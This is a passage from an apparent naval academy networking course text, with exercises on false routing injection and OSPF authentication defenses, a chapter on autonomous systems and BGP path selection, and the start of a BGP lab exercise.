routing table, what network address and mask should the attacker choose? In answering this question, complete the table below. 385 (c) Complete the routing table entry below with your answer from (b) and draw a line into Router C’s routing table showing where the attacker’s false network would go. (d) What is the first and last IP address of the false network you chose for the evil instructor? (e) Does the IP address of the webserver fall within your choice for the evil instructor’s false network? (f) Given your answer to part (e), whenever a midshipman sends a packet destined for the webserver at 8.8.8.26 where will Router C forward their packet? Will the midshipman ever be able to reach the important website? (g) List and briefly describe two technical solutions that could be implemented on Router C to prevent the evil instructor from injecting false routing information. (h) Who is responsible for implementing these security measures in a network? 5. What does a router assume by default when another router sends it information about the state of its links or the distance between it and other routers? 6. An attacker is located on the 3.4.5.0/25 network and wants to prevent midshipmen from reaching a website at 8.9.7.96. The network is depicted below. He turns his computer into a router using Loki and advertises a false network of 8.9.7.80/28 to Router A. 8.9.7.96 RA, eth1, 8.9.7.65 RA, eth0, RB, eth0, 8.9.7.64/26 1.2.3.1 1.2.3.0/24 1.2.3.10 3.4.5.1 RB, eth1, 3.4.5.0/25 EVL, eth0, 3.4.5.32 8.9.7.80/28 386 7.7.7.1 Internet RB RA RA, eth2, 8.9.7.66 (a) Fill in the blanks in the table below to complete Router A’s routing table. (b) In the line provided below Router A’s routing table, fill in the false route the attacker would inject. (c) Draw a line from the false route pointing to the location in which it would be injected into Router A’s routing table. (d) Will the attacker be successful in redirecting the midshipmen’s traffic? Justify your answer. (e) List and briefly describe two technical solutions that could be implemented on Router A to prevent the attacker from injecting false routing information. (f) Who is responsible for configuring these security measures on Router A: the Network User, the Network Administrator, the Network Hardware Manufacturer or the Network Programmer? 387 388 Security Exercise 16 Introduction It is interesting to hear the theory behind a Man-In-The-Middle attack, but it is better to experience it yourself. 1. Set-Up Equipment required: Your issued Laptop. o Turn off the wireless adapter. o Connect the blue Ethernet cable at your desk to your issued laptop. Your completed network diagram from SX#15 and a printed copy of this security exercise. o Separate the answer sheet and have it ready to fill in. VMware Workstation o Power on your Cyber2 VM, then click VM and Settings. o Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected directly to the physical network, and Replicate physical network connection state are selected or checked, then click OK. o Open a terminal in your Cyber2 VM and execute the command sudo dhclient Once it finishes, execute the command ifconfig You screen should look similar to Figure 1 on page 390. Interface eth1 should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 100 and 199. If not, notify your instructor or lab technician. 389 Figure 1 – ifconfig executed after initial lab setup. Part 2: The Evil Instructor 1. The Attack The evil instructor wants to deny you access to www.usna.edu. Just like you discovered in SX#15, he has found the IP address for the website and understands that routers work using the longest mask matching principle. He also understands the default assumption between routers in the routing algorithms they use to construct their routing tables. Let’s start by verifying the correct website. use traceroute –n to identify the route to www.usna.edu. access www.usna.edu using Firefox to verify the name of the site administrator Question 1: What is the assumption the evil instructor understands about routers in the routing algorithms they use? STOP! Observe Demonstration #1 When directed, label part m) of your network diagram. When directed, use traceroute to identify the new route to www.usna.edu. When directed, access www.usna.edu using Firefox. If already open, refresh your browser using either method below. Ctrl + Shift + R or Shift + Question 2: After the evil instructor injected false routing information into the network, where did your traffic destined for www.usna.edu go? Was the website still available? Question 3: What did your evil instructor attack in order to deny you access to www.usna.edu? Pick one. a) your virtual machine b) the Webserver c) a script running on the webpage d) the network Question 4: What pillar of information assurance did this affect? STOP! Observe Demonstration #2 When directed, refresh www.usna.edu using either method below. Ctrl + Shift + R or 390 Shift + When directed, use traceroute identify the new route to www.usna.edu. Question 5: Who maintains the website at www.usna.edu? It may not seem very significant to have your homework interrupted or altered by a Man-In-The-Middle attack, but what if the website you were visiting was more important? For example, what if you needed to check on the status of your second class loan with your bank? STOP! Observe Demonstration #3 When directed, refresh www.usna.edu using either method below. Ctrl + Shift + R or Shift + Question 6: What fake website did your evil instructor misguide you to and what pillar of information assurance did this affect? Recall from SI110, that the X.509 certificate system provides a mechanism to establish a secure connection with a website. It provides assurance between a website’s domain name and their public key. That is, when the lock closes in our browser ( ) and we establish a secure connection with a website, we know the public key that was used to transfer a symmetric encryption key was done using the public key which belongs to a particular domain name. Question 7: If the X.509 certificate system only offers proof that a public key belongs to a specific domain name, whose responsibility is it to verify if a website is authentic? 2. The Fix #1: Easy as 123456 Recall from Lesson #16, the Open Shortest Path First (OSPF) protocol has two authentication mechanism built in to protect against the injection of false routing information. The first is a simple plaintext-password added to all Link State Packets (LSPs) so each router can authenticate the information it is receiving. However, by including the password in plaintext with each LSP, you can easily discover the ‘secret’ password by observing the LSPs with Wireshark. This is similar to how you discovered the victim’s password in SX#14. Much more interesting is the second method for authentication in OSPF, an MD5-hash of the OSPF packet and a shared secret key. Recall from SI110, that hashing is a ‘one-way’ encryption technique that produces the same message digest (i.e., encrypted output) given the same input string. Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest (remember the Rubik’s cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves with other routers. Of course, all routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services where there are literally thousands of routers. Question 8: We have all been told to change our password regularly to increase security, but do you think it is easy to change the shared secret key in every router at a place like Google or Amazon (or even the Naval Academy)? Do you think there may be an incentive for network administrators to make the shared secret key something easy to remember? STOP! Observe Demonstration #4 When directed, refresh www.usna.edu using either method below. Ctrl + Shift + R or Shift + Question 9: What are some important things to consider when choosing a password? 3. The Fix #2: Passive Aggression Consider the topology of your network diagram from a security perspective. Question 10: Is there any reason Router B should listen to routing information being sent over interface eth2? Most implementations of OSPF allow for creation of passive interfaces. Just like when your roommate starts getting on your nerves and you tune him or her out by putting your headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface. However, this requires network administrators to make smart decisions when setting up the topology of their networks and configuring their routers. 391 STOP! Observe Demonstration #5 Question 11: How many OSPF Hello packets did your instructor receive once the passive interface was enabled? Question 12: As a user who do you trust by default for the safe and effective administration of your network? Do you have the ability to control the security of the network on your own? 4. Clean Up VMware Workstation o In the VMware Workstation menu click VM and Settings. o Select Network Adapter and ensure that Connected, Connected at power on, and NAT: Used to share the host’s IP address are not selected or unchecked, then click OK. o Suspend your Cyber2 VM. o o Disconnect the blue Ethernet cable. Turn on your wireless adapter. 392 Security Exercise 16 Answer Sheet Name: Router A’s Routing Table Mask Network Address Next-Hop Address Interface /0 0.0.0.0 Default eth5 False Route Injection Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: 393 Question 11: Question 12: 394 Chapter 17: Border Gateway Protocol Objectives: (a) Discuss the major concerns with the use of a single protocol for the Internet. (b) Describe the various autonomous system categories. (c) Utilize path attributes to determine the path of a packet across ASes (d) Demonstrate the ability to state the BGP announcements that would be made given an internet diagram. I. Internet Structure Up to this point, all we’ve looked at are a small set of Local Area Networks (LANs) which have been connected together through a limited number of routers. As an example, consider the network topology discussed in Chapter 16. It was comprised of only a few small networks and a few routers which facilitated access to a single webserver. This group of networks would be easily manageable by one organization, but this network is not representative the Internet today. Today’s Internet comprises thousands of networks managed by a countless number of different people spread across the entire globe. But how did the Internet become so big, and what did the Internet look like when it first began? 1. The Internet of Old It used to be that the structure of the Internet was like that of a tree, one central trunk (aka. the backbone) that fed to all the other downstream entities. The picture below shows the Internet circa 1990. End users (such as Stanford and UNM in the figure) connected to "service providers" (such as Westnet regional) which in turn connected to a single backbone. Recall from Security Exercise 14 that the single backbone, circa 1990, was funded by the National Science Foundation—hence the name "The NSFNET backbone". Peterson and Davie, Computer Networks, A Systems Approach, Morgan Kaufmann, 2007 395 We also learned in Security Exercise 14 that the Internet evolved over time. Multiple companies offered to provide backbone services, and gradually the original tree-like structure (with a single backbone) was replaced by a multi-backbone structure. Additionally, multiple networks oftentimes decided to connect directly together, avoiding the backbone altogether. The companies providing backbone services also recognized the utility in connecting the backbones together. 2. Today’s Internet Representation of Today’s Internet Structure Today there are several backbones run by different private corporations and governments to provide global connectivity. You may even recognize some of these backbones. They are key communication players like: AT&T, Sprint, Level 3 Communications, Verizon, and others… Much of the Internet's traffic is eventually routed through at least one backbone. Thus, a particular backbone can manipulate the traffic that goes through it. Recall from Chapter 11 that we saw several examples of how this power was abused through error or malicious intent to observe, change or stop the flow of traffic across the Internet. Specifically, you learned how YouTube was brought down by the actions of the Pakistan Telecom Authority on February 4 th, 2008. But, for now, let’s understand a bit more about how these backbones interconnect. The backbones are interconnected by peering points that allow connectivity between the backbones. These peering points (Internet Exchanges) are voluntary connections between different networks which increase redundancy and capacity. Although competitors, backbone providers desire these peering arrangements just in case one backbone is suddenly asked to deliver more traffic than it is capable of (in which case it can send the excess to a competitor) or in case one backbone is knocked offline completely. The provider networks use the backbones for global connectivity, and, in turn, the customer networks utilize the services of the provider networks. Any of the three (the backbones, the provider networks, or the customer networks) can provide services (although at different levels) and can be called Internet Service Providers (ISP). Note some of the complexities in the figure above. For example, customer networks can connect to two (or more) different provider networks in order to increase redundancy. Provider networks can connect directly to two (or more) backbones, again for redundancy. Additionally, provider networks can connect directly to peering points within an Internet Exchange. 396 Still, though, the picture of the Internet above is a cartoonish oversimplification. Consider the picture of the Internet shown below, noting the small inset that is expanded. 31 Image of a small grouping of networks within the Internet An Aside The structure of the Internet has as much to do with money and politics as it does with technology. Consider the fact that the backbones are run by companies such as AT&T, Sprint and Verizon. Why them? These companies had the regulatory rightof-way clearance (i.e., the legal permission) to run long-distance cable across the country, and the finances to support the operation. You may wonder about those peering points—why would a company agree to allow a competitor the option of using their backbone network? Well… consider what the Internet would look like without peering points! We would not have a single Internet—we would have an AT&T Internet, a Sprint Internet, a Verizon Internet, etc. That would cause more problems for everyone. Using peering points allows connectivity between the backbones, preserving the operating idea of a single network. A major peering point is the networking equivalent of one of those Paris traffic circles: a huge amount of traffic, very busy, very high speed, somewhat mind boggling. The Border Gateway Protocol which we discuss in this lecture implements orderly negotiation among the peering, bringing some order to that chaos. 3. Inherent Problems with a Single Routing Protocol As of December 31, 2013, there were 7.2 billion people in the world, of which 2. 8 billion were Internet users.32 All of these users collectively produce a gargantuan amount of network traffic, which traverses many, many networks (with many, many 31 For an alternative view of the Internet, arranges in a spherical shape, see http://www.technologyreview.com/news/408104/mapping-the-internet/ . 32 http://www.internetworldstats.com/stats.htm 397 interconnecting routers). With all these users and devices, there is no way that routing on the Internet can be accomplished using a single protocol. There are two major issues that prevent the use of a single global routing algorithm on the Internet: a. Scalability: Can you imagine the size of the routing tables each router would have to maintain? Routing tables would become— what's the word… behemothic? These elephantine routing tables would mean that: 1) Searching for a destination would be extremely time consuming; and 2) Updating such unwieldy tables would create excessive amounts of needless traffic. b. Administration: Even if we could manage the scalability issue, a larger issue concerning network administration looms before us. We have described two different routing methodologies: link state routing and distance vector routing. Both approaches model the underlying network as a graph, where the routers comprise the nodes of the graph, and an edge is drawn between two routers if the routers are directly connected. Recall that each edge in the graph has a weight associated with it. Both of the routing approaches seek to determine a route from a source (say Router A) to a destination (say Router B) that has a minimum total weight. For example, if the weights on the graph edges represent cost, the algorithms will determine the minimum cost route from A to B. If, on the other hand, the weights represent time delay, then the algorithms will determine the minimum delay route (i.e., the fastest route) from A to B. You may have already noticed a problem with this approach to routing. Suppose Provider Network X owns and runs a network that comprises a large number of routers (and interconnecting edges). Suppose that Provider Network Y also owns and runs a network that comprises a large number of routers and edges. Suppose the networks for both Provider Network X and Provider Network Y are connected to the global Internet, as shown in the figure on page 396. So far, so good. Suppose, though, that Provider Network X is really ElCheapo Inc, and is only concerned with cost, and so has assigned the edge weights to measure cost. For Provider Network X, which promotes itself as "The cheapest ISP in town", delay is not a concern. Provider Network Y, on the other hand, is really SpeedyISP Inc, and is only concerned with delay, and so has assigned the edge weights to measure delay. For Provider Network Y, which advertises itself as "The fastest ISP in town", cost is not a concern. Choosing a single routing algorithm that satisfies both Provider Network X and Provider Network Y will be problematic. If the chosen algorithm minimizes the cost, Provider Network Y might be unhappy since the delays might be intolerable. If the chosen algorithm minimizes the delay, Provider Network X might be unhappy since the costs might be intolerable. Even if we could find a routing algorithm that satisfies every organization on Earth (we can't!—but suspend disbelief for a moment), other problems would remain. Would the Pentagon want its traffic to Afghanistan routed via Iran, even if routers within Iran were along the ideal route? Even in peacetime, a country may decide that it would like traffic that begins and ends in the country to stay exclusively within the country; for instance, we might want traffic from San Diego to San Antonio to avoid Mexico, even though a straight line from San Diego to San Antonio would travel through Mexico twice. In a commercial context, an organization might not want to carry traffic that begins on a competitor's network and ends on another competitor's network, unless the competing networks are willing to pay. In a nutshell, the problem is that the owners of individual networks each want to set their own rules for routing within their networks, without being concerned with what rules others are electing to follow. So, then, what to do? The answer (remember, this is America, and we believe in freedom!): Let entities that own portions of the Internet run their own routing algorithms, independent from what others might be doing! II. Autonomous Systems This problem is solved by partitioning the Internet into a number of separate networks, called Autonomous Systems (AS's). The organization which owns the AS may independently choose the routing algorithm of its liking to be used within the AS. If Organization X runs AS X, it is free to run a routing algorithm within its network that minimizes cost. If Organization Y runs AS Y, it is free to run a routing algorithm within its network that minimizes delay. We say that each AS runs an interior routing algorithm, which is, in common parlance, referred to as an interior gateway protocol. The Internet, thus, is actually a collection of Autonomous Systems. There are approximately 48,500 Autonomous Systems connected to the Internet today. 398 Each AS is under the control of a single administrator. AS's range in size and scope from corporations (e.g., General Motors is an AS) to large Internet Service Providers (e.g., Comcast is an AS). Again: each AS can decide how it wants to route within its own AS. 1. The Powers that Be Each autonomous system (whether small, medium, or large) is given an autonomous system number (ASN) by the Internet Corporation for Assigned Names and Numbers (ICANN). Assigning an ASN follows a similar procedure as with the assignment of blocks of IP addresses. Referring to the picture on page 297 of the notes: 1) The Internet Assigned Numbers Authority (IANA) distributes ASNs. 2) IANA allocates blocks of ASNs to the five Regional Internet Registries. 3) Each Regional Internet Registry will distribute the ASNs as autonomous systems are developed and require an ASN. 4) Each ASN is a 32-bit unique identifier which is typically represented as a decimal value (e.g., AS6059 is the University of Maryland). Although there are different sizes of ASes, they are not categorized according to their size. Rather, they are categorized according to how they are connected to other ASes. 2. AS Categories Stub AS a. A stub AS has only one connection to another AS b. Data traffic either originates or terminates in a stub. In other words, the stub autonomous system is either a source or destination of data. Stub Autonomous System Multihomed AS a. A multihomed AS may have more than one connection to other ASes, but doesn’t allow data to transit through it. b. This autonomous system is still either a source or destination of data. c. A customer network is a good example of a multihomed AS. In the picture to the right, the customer network will not support traffic that begins with a user in ISP 1 and is destined for a destination user in ISP 2. Multihomed Autonomous System Transit AS a. A transit AS is connected to more than one AS. b. A transit AS allows traffic to pass through. c. Provider networks and the backbones are examples of the transit AS's. In the picture to the right, transit AS will support traffic that begins with a user in ISP 1 and is destined for a destination user in ISP 2. Transit Autonomous System 399 Practice Problem 17.1 Consider the picture below, showing the interconnection of four AS's. Note that traffic can route from New York through Paris and Cannes and eventually get to Bonn, but traffic that goes from New York to Berlin to Bonn and on to Stuttgart cannot proceed onward to Cannes. What are the categories of each of the AS's? AS2 AS3 AS1 AS4 Solution: Practice Problem 17.2 Problems with routing protocols arise from issues of scalability or arise from issues of administration. Classify each of the problems below as a problem of scalability or of administration. (a) (b) (c) (d) Solution: Verizon wants Netflix to pay for routing data through its network. Routers can only hold a limited amount of table entries. Extremely large routing tables cause delays in packet forwarding. Brazil and Europe decided not to route their traffic through the United States to avoid NSA spying. (a) (b) (c) (d) 3. Routing with Autonomous Systems We can route among multiple networks within a single AS by using the intra-domain (interior) routing protocol decided upon by the organization exercising administrative control of the AS. But since each AS might be doing something different, how do we interconnect AS's to communicate with each other? This problem requires that each AS runs, in addition to its internal protocols, a global protocol that glues all of the AS's together. This global routing protocol is variously referred to as an inter-AS routing protocol, an inter-domain routing protocol, or an exterior gateway protocol. Specifically, the inter-domain protocol the Internet utilizes is the Border Gateway Protocol (BGP). Thus, in the Internet, routing between AS's is done using BGP. 400 From Tanenbaum, Computer Networks, 4th ed, Prentice Hall III. Overview of BGP BGP is a complex protocol. Let's first learn to appreciate this protocol by looking at an example that abstracts away many of the complexities. Let's begin by limiting the discussion to the routers that actually run the Border Gateway Protocol—the routers that are on the boundary of one AS and have a connection to another AS. The diagram below, for example, shows two AS's interconnected. In this case, routers R1 and R2 would run the BGP protocol. These two routers—R1 and R2—we term BGP routers. 401 BGP routers see the graph of the Internet very differently from ordinary routers. To a BGP router, the Internet is a set of AS's and the links connecting them. As a simplified example, BGP routers might see the Internet as the picture shown below, where all nodes (A through K) are BGP routers. K From Tanenbaum, Computer Networks, 4th ed, Prentice Hall Let's say that if we superimpose AS's onto this figure, we see the picture below. AS6: Death to America AS3: Comcast AS2: Afghanistan AS7: Verizon AS1: Pentagon AS5: Sprint K AS8: Starbucks AS4: AT&T Note that we see our three flavors of AS in the picture above: Stub AS's have a single connection to the BGP graph. Thus, stub AS's cannot route traffic that begin and end at other AS's. In the picture above, AS8 is a stub. Multi-homed AS's connect to two different AS's but refuse to carry transit traffic. For example, in the figure above, suppose AS2 is willing to send traffic originating within AS2 to either one of its neighbors (AS5 or AS6) and is willing to accept traffic from either one of its neighbors, provided the traffic terminates at a user in AS2. But suppose that AS2 is not willing to route traffic from AS5 to AS6. If these conditions hold, AS2 is a multi-homed AS. Transit AS's are willing to carry transit traffic originating and ending in other AS's. For example, in the figure above, if AS4 is willing to carry traffic from AS3 to AS5 (and vice versa), then AS4 is a transit AS. Let's return to our picture of the Internet, focusing on Router F in AS1 and Router D in AS2: 402 AS6: Death to America AS2: Afghanistan AS1: Pentagon K Each BGP router maintains a routing table to other destinations. However, BGP keeps the full path in use for each destination. BGP routers exchange tables with neighbors telling neighbors the exact path in use. Let's focus on AS1, the Pentagon, which wants to send data to AS2, a US command center in Afghanistan. In terms of the BGP graph, Router F wants to send traffic to Router D. With BGP, each of Router F's neighbors—Router B, Router E, Router I and Router G—will tell Router F the full path they use to reach Router D. Let's look at each in turn: Hi Router F. When I want to reach Router D I take the path B – C – D (which is AS3 – AS6 – AS2). AS6: Death to America AS3: Comcast AS2: Afghanistan AS1: Pentagon K AS6: Death to America 403 AS2: Afghanistan AS1: Pentagon AS5: Sprint K AS4: AT&T Hi Router F. When I want to reach Router D I take the path I – J – H – D (which is AS4 – AS5 – AS2). AS6: Death to America AS2: Afghanistan AS7: Verizon AS1: Pentagon Hi Router F. When I want K D I take the to reach Router path G – C – D (which is AS7 – AS6 – AS2). Note that an interesting thing happens when Router E starts to talk to Router F 404 AS6: Death to America AS2: Afghanistan AS1: Pentagon K Hi Router F. When I want to reach Router D I take the path E–F–… AS4: AT&T STOP RIGHT THERE! I'm not interested in your route since it goes through me. The point illustrated in the picture above bears repeating: An AS will not accept a route containing its own AS number because this will cause a routing loop to occur. So, now Router F looks at the information it has received: To get to Router D in AS2: Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2). Go via Router I: The path will be: I – J – H – D (which is AS4 – AS5 – AS2) Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2). Here is where the beauty (and the complexity) of BGP enters into the picture: BGP allows the AS network administrator to impose policies on how traffic is routed. These policies are manually entered into the BGP router. So, for instance, if the network administrator of AS1 sets the policy rule: No traffic originating in AS1 will transit through Router C: AS6 then the BGP Router F can immediately decide on the route from Router F to Router D by modifying the table above: To get to Router D in AS2: Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2). Go via Router I: The path will be: I – J – H – D (which is AS4 – AS5 – AS2) Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2). Let's conclude our Big Picture overview of BGP by summarizing what BGP does (and doesn't do). A router running BGP: First attempts to find all paths from the router to a given destination… and then judges these paths against the policies of the AS administrator… and then selects a "good-enough" path to the destination that satisfies the policy constraints. In the third bullet above, why did we say that BGP "selects a 'good-enough' path to the destination"? Why didn't we say that BGP "selects an optimal path to the destination"? The reason: BGP selects routes across multiple AS's, each having their own (potentially conflicting) definitions of optimality. Whereas intra-domain routing algorithms (confined to operate within a single AS) can attempt to find a least-cost path, BGP can only find a "good-enough" path that will work while satisfying policy constraints. Thus BGP really only provides an indication of reachability—that is, the availability of routes from source to destination. BGP makes no attempt to advertise routing optimality. 405 Unfortunately, BGP makes no attempt to provide security either—a topic we will explore. Practice Problem 17.3 Consider the network shown below. (a) What type of Autonomous System is AS3? (b) What would happen if AS1 declared itself to be a multi-homed AS? Solution: (a) (b) Effect of BGP on Routing Tables In Chapters 15 and 16 we showed how routing algorithms such as link-state routing and distance vector routing can be used to build up routing tables within an isolated AS. In this chapter we showed how BGP routers can determine the routing decisions for traffic that has to traverse multiple AS's. This may leave you wondering: Do routers have two routing tables—one for routing with the AS and another for routing to a different AS? The answer is: No, routers have a single routing table. Once BGP routers have decided the correct paths to other autonomous systems, that information is then used to supplement the existing routing tables for other routers within an AS. Put another way: the information gathered by BGP is incorporated into the intra-domain routing tables. IV. BGP Route Selection So, how are BGP routes selected? Let's return to the notation where, from the viewpoint of a BGP router, the Internet is a collection of interconnected AS's. Let's suppose, for example, that you are the BGP router for AS1 in the network shown below. Let's say that your goal is to send data to your friend in AS3. Note that your data can travel over three potential routes. We will develop the BGP path selection algorithm incrementally. For starters, we will say that the BGP path selection algorithm is shown in the flow chart below. 406 So, first and foremost, the AS policies are considered. After weighing the AS policies, the route that traverses the fewest number of AS's is selected. Practice Problem 17.4 You are the BGP router for AS1 in the network shown below, and you would like to send data to AS3. (a) What path is used if the administrator for AS1 has set a policy that no data from AS1 may go to AS2? (b) What path is used if the administrator for AS1 has set no specific local preferences? Solution: (a) (b) Note that the local preference does not need to be a binary go/no-go decision (such as "Do not route through AS2"). The local preference can also be specified as an integer, where a higher integer indicates a more preferred path. 33 Local preferences can also be applied to specific network prefixes rather than an entire AS. As indicated earlier, how local preferences are structured is completely at the discretion of the network administrator. Part of BGP's strength is the high degree to which it can be customized. 33 Note that in BGP local preferences, higher values indicate a stronger preference. This is different from the intra-domain routing protocols we have examined for which lower weights were preferred (i.e., we choose paths with the lowest weight). 407 Practice Problem 17.5 Suppose that in the network below, the administrator for AS1 has set a policy that no data from AS1 may go to AS2. Additionally, AS1 has set a local preference value of 500 on the AS4-AS5-AS3 path and a value of 100 on the AS6-AS7-AS3 path. Which path does data traverse from AS1 to AS3? Solution: It should be noted that we have only skimmed the surface of the BGP protocol. There are other attributes that can enter into the path selection algorithm beyond those mentioned above (local preferences and least-number-of AS's-in-the-path). How do ASs relate to me? In an article first reported on the website Ars Technica in February 2014, telecommunication companies Verizon and Cogent Communications had a disagreement over peering. 34 Cogent is a large backbone provider and also provides Internet connectivity for a “small company” called Netflix, which by some estimates accounts for over 30 percent of current Internet traffic. Apparently, Netflix traffic was overwhelming the links to the Verizon network causing many packets to be dropped. However, Verizon refused to upgrade its infrastructure. Note that Verizon and Cogent have multiple peering points throughout the US. From Verizon’s viewpoint, Cogent was sending it way more traffic than Verizon sent to them and they should pay fees for any upgrades. This resulted in Verizon customers perceiving Netflix and anything else traversing those communications links as being slow or unresponsive. To alleviate problems such as this, Netflix has resulted to making deals with Internet Service Providers such as Comcast, Verizon, and AT&T to directly connect to their networks and deliver traffic. Each company in this situation has networks large enough to be ASes. BGP is the mechanism for how these ASes advertise routing information to each other. When two ASes feud as above, it can have a noticeable effect on their customer’s Internet experience. 34 See http://arstechnica.com/information-technology/2014/02/netflix-packets-being-dropped-every-day-because-verizonwants-more-money/ for more details. 408 Problems 1. Which of the following are examples of why a single-protocol internet would be a concern? (Choose all that apply) a. b. c. d. 2. Across the globe, individual network administrators each want to set their own rules for routing within their networks without being concerned with what rules others are electing to follow. The world's network administrators unanimously agree on the best single routing algorithm that satisfies all of their respective networking and routing needs. Under a single-protocol internet structure, searching for a destination would be extremely time-consuming. Under a single-protocol internet structure, updating the routing tables would create excessive amounts of needless traffic. Fill in the appropriate Autonomous System (AS) category or categories under each of the descriptions (Choose from: Stub, Multihomed, and Transit) below. a. An AS is connected to more than one other AS and it allows traffic to pass through it. b. An AS has only one connection to another AS, and it can act as a source or destination of data. c. An AS may be connected to one or more ASs, and it does not allow data to pass through it, but it can still act as a source or destination of data. d. A 'Provider Network' is a good example of this type of AS. e. A 'Customer Network' is a good example of this type of AS. 3. True or False. BGP provides an indication of reachability which ensures that the optimal route is advertised. Explain your answer. 4. Refer to Figure 1 below and label each AS with its correct category: Stub, Multihomed, or Transit. (Assume AS4 is set up to pass along traffic originating from and ending in other AS's, but AS2 will not do this.) Figure 1: Four Autonomous Systems 5. State and briefly describe the two problems solved by partitioning the Internet into a number of separate Autonomous Systems vice using a single routing protocol. 6. If I want to use a method beside use of local preferences to ensure that our traffic does not go through ASs that are not trusted or that are unfriendly, I would 409 a. secure my BGP Routers to ensure no traffic is transmitted. b. buy all the ASs between the source and destination so I know I could trust them. c. ignore any advertised routes that contain those dangerous ASs. d. use MD5-hash on the link state packets I transmitted. 410 Security Exercise 17 Part 1: Initial Setup Let’s put to use the networking skills we have learned to date to better understand how the Internet works and where our traffic is supposed to go. 1. Set-Up Man, I love cyber! I also love basketball. Who am I and how many inches did I grow as a mid? Equipment needed: A printed or electronic copy of this security exercise. o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in. Your issued Laptop. o Ensure Chrome or Firefox is installed on your Windows computer. o Turn up the volume on your computer. o Turn off the wireless adapter. o Connect the blue Ethernet cable at your desk to your issued laptop. o Wait for an IP address to be assigned to your LAN interface. o Verify by pressing the Windows Orb key and in the program search bar, type cmd Hit enter to launch the Windows terminal and then, at the command prompt, execute ipconfig 411 Now, your screen should look similar to the figure below. Your Ethernet adapter should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101 and 254. If not, notify your instructor or lab technician. Part 2: Welcome to the EC310 Internet! 1. A Quick Review Once again, locate EC310 MID on your network diagram. Your Windows laptop has just joined the virtual network you connected to previously in SX#15 and SX#16. Specifically, your Ethernet card has been assigned an IP address on this virtual network. As before, in order for your packets to leave this virtual network and venture out into the virtual world, your laptop must send them to a Gateway Router. Router A serves this purpose again for the network you are connected to. However, in order to send your packets to Router A, your computer must know several things first. Answer the following questions using the information from ipconfig. Question 1: What is your network address and network mask in CIDR notation? Question 2: What is the default Gateway’s IP address? Question 3: What protocol would your computer use to identify the MAC address of the default Gateway? Address Resolution Protocol Open Shortest Path First Protocol Border Gateway Protocol Question 4: Why would your computer need to know the MAC address of the default Gateway to reach the Internet? New to this virtual world are a number of Autonomous Systems (ASes) which comprise the EC310 Internet. You are located in AS2016, the virtual US Naval Academy. Two Internet Service Providers (ISPs) connect AS2016 to the remainder of the Internet: (1) AS20, Bay Area Broadband and (2) AS30, Chesapeake Cable. The Naval Academy connects to two ISPs to provide redundancy in their communication infrastructure and balance network traffic during peak demand. However, they do not wish to carry traffic from Bay Area Broadband to Chesapeake Cable or vice versa. Question 5: What category of Autonomous System is AS2016? Question 6: What category of Autonomous System are AS20 and AS30? For your Internet traffic to leave AS2016 it must reach Router 16. Router A does not have a direct connection to Router 16 and therefore must learn how to reach it. Question 7: What protocol will Router A use to discover the optimal path to the Router 16? Address Resolution Protocol Open Shortest Path First Protocol Border Gateway Protocol Question 8: This is an example of what type of routing protocol? Intra-domain Routing Protocol Inter-domain Routing Protocol Router A discovers the optimal path to Router 16 is through a direct connection to Router C via the 2.2.2.0/29 network. Router C will forward all traffic destined for addresses external to AS2016 to Router 16. Router 16 will decide where to forward these packets using information it has gained about the Internet from Router 20 in AS20 and Router 30 in AS30. 412 Question 9: What protocol will Router 16 use with Router 20 and Router 30 to learn where to reach a destination on the Internet? Address Resolution Protocol Open Shortest Path First Protocol Border Gateway Protocol Question 10: This is an example of what type of routing protocol? Intra-domain Routing Protocol Inter-domain Routing Protocol 2. A Brief Respite Let’s be honest. It’s been a little rough these past ten weeks learning about the stack-based buffer overflow and how computer networks interconnect. Wouldn’t it be nice for a break for a change? Have no fear. The ECE Department, universally known as the The Caring Department, has come to your aid once again. For your viewing pleasure, in this virtual world there is a new website located at http://www.midtube.com. Verify the website www.midtube.com exists by opening Firefox or Chrome on your Windows computer (i.e., not you Cyber2 VM) and navigating to the website address. Log in by creating a username and password of your choice (do not use a username or password you would not like exposed). Browse the website to see what information is available. Question 11: What does the Zoomie say? 3. How Do I Get There Again? Of course nothing is ever easy in EC310 and neither is the process to reach the MidTube webserver across the EC310 Internet. Router 16 is responsible for directing your Internet traffic to this website and as you just learned in Chapter 17, it goes through a path selection algorithm to determine where to send your web requests. To better understand how this path selection algorithm works, it is important to know what information Router 16 will receive about the Internet from its neighboring ASes. Let’s work backwards from the target destination, MidTube’s webserver, to construct this information. First, the MidTube webserver is located on the network 17.17.200.0/24, which is originally advertised by Router 5 to Router 50 in AS50 and Router 60 in AS60. Once Router 50 hears about this network, it will apply its own BGP path selection algorithm to determine if there are any local preferences which would reject or select the path suggested by Router 5 to reach network 17.17.200.0/24. If there are no local preferences, it will compare the path received from Router 5 with all other paths that Router 50 has learned to reach 17.17.200.0/24 to determine if the path through R5 has the shortest AS-path length. If this is true, Router 50 will prepend (i.e., put in front) its own AS number to the AS-path list to indicate that 17.17.200.0/24 can be reached through AS50. Router 50 will then forward this new announcement on to all other peers via a BGP update message. Question 12: Assuming no local preferences are set, what path will Router 50 advertise to all other peers to reach network 17.17.200.0/24? Label part a) on your network diagram with the network address and the AS-Path that Router 50 will announce to all other peers. Once Router 30 learns about network 17.17.200.0/24 from Router 50, it will also apply its own BGP path selection algorithm, prepend its AS number to the selected path, and announce this network and path to its BGP peers. Question 13: Assuming no local preferences are set, what path will Router 30 advertise to all other peers to reach 17.17.200.0/24? Label part b) on your network diagram with the network address and the AS-Path that Router 30 will announce to all other peers. Router 20 will also learn about possible paths to network 17.17.200.0/24 from its peers in a similar fashion. It connects with another ISP, AS40, Monsoon Megabyte and a startup web hosting company, 413 AS2003, based in Eastern Europe. The web hosting company welcomes all traffic to it, but it does not provide transit between 